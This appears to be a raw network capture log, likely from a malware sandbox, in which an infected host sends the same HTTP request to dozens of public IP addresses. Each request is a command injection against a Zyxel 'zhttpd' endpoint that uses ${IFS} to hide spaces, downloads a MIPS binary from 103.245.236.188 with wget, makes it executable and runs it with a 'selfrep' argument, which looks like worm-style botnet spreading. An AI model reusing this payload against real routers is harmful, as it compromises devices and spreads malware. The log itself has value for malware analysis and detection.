                                    Jan 13, 2024 19:02:21.883174896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1263192.168.2.1338082113.180.177.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883198977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1264192.168.2.133930020.226.41.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883250952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1265192.168.2.1352206122.163.155.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883266926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1266192.168.2.134693069.190.253.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883297920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1267192.168.2.1359252193.43.214.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883347988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1268192.168.2.1345178184.245.148.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883402109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1269192.168.2.1340160106.111.115.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883435965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1270192.168.2.1347088147.32.23.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883471966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1271192.168.2.1337808201.217.140.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883508921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1272192.168.2.1335876124.209.64.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883533001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1273192.168.2.135956896.146.209.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883593082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1274192.168.2.1349044128.123.141.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883626938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1275192.168.2.136031236.108.108.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883646011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1276192.168.2.135035253.217.226.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883690119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1277192.168.2.1357174170.113.69.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883721113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1278192.168.2.1349818137.85.238.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883790970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1279192.168.2.133627099.82.105.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883816957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1280192.168.2.133314844.131.62.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883846998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1281192.168.2.134642667.121.67.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883897066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1282192.168.2.1349756200.160.171.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883927107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1283192.168.2.136021243.34.205.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883976936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1284192.168.2.134388212.206.181.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884021997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1285192.168.2.1353614109.145.110.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884047031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1286192.168.2.1346076220.29.150.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884069920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1287192.168.2.133932467.240.196.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884109020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1288192.168.2.1354026165.159.201.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884150028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1289192.168.2.1335178212.250.130.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884201050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1290192.168.2.1352912146.199.171.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884231091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1291192.168.2.1344570155.177.34.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884264946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1292192.168.2.1357920208.86.101.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884319067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1293192.168.2.133798095.219.204.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884352922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1294192.168.2.1344268152.75.148.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884377956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1295192.168.2.1352750174.109.74.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884407997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1296192.168.2.134118247.83.172.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884460926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1297192.168.2.133833237.169.94.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884489059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1298192.168.2.135475017.166.204.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884525061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1299192.168.2.1357382205.110.254.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884577036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1300192.168.2.134042454.141.82.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884593964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1301192.168.2.1357366201.167.128.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884632111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1302192.168.2.135473659.98.81.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884675026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1303192.168.2.135724873.18.227.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884720087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1304192.168.2.1339916146.70.37.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884752035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1305192.168.2.1343104162.3.171.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884794950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1306192.168.2.134953477.6.214.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884841919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1307192.168.2.1356538183.207.189.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884891033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1308192.168.2.134792073.33.200.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884915113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1309192.168.2.134579673.188.102.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884948969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1310192.168.2.135790448.97.229.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.884985924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1311192.168.2.1343648158.102.208.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885035992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1312192.168.2.134667652.50.242.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885093927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1313192.168.2.133422035.192.109.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885117054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1314192.168.2.135463683.80.54.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885132074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1315192.168.2.1339716198.248.101.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885159016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1316192.168.2.1358476189.105.222.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885209084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1317192.168.2.1347866201.157.178.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885240078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1318192.168.2.1345294174.107.121.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885262012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1319192.168.2.1333756151.80.195.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885277033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1320192.168.2.1337022109.34.161.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885341883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1321192.168.2.1344888192.196.37.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885371923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1322192.168.2.1340368126.52.190.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885410070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1323192.168.2.1350676203.142.28.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885447979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1324192.168.2.1359558203.83.2.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.885482073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1325192.168.2.1351004144.133.49.250443
                                    TimestampBytes transferredDirectionData
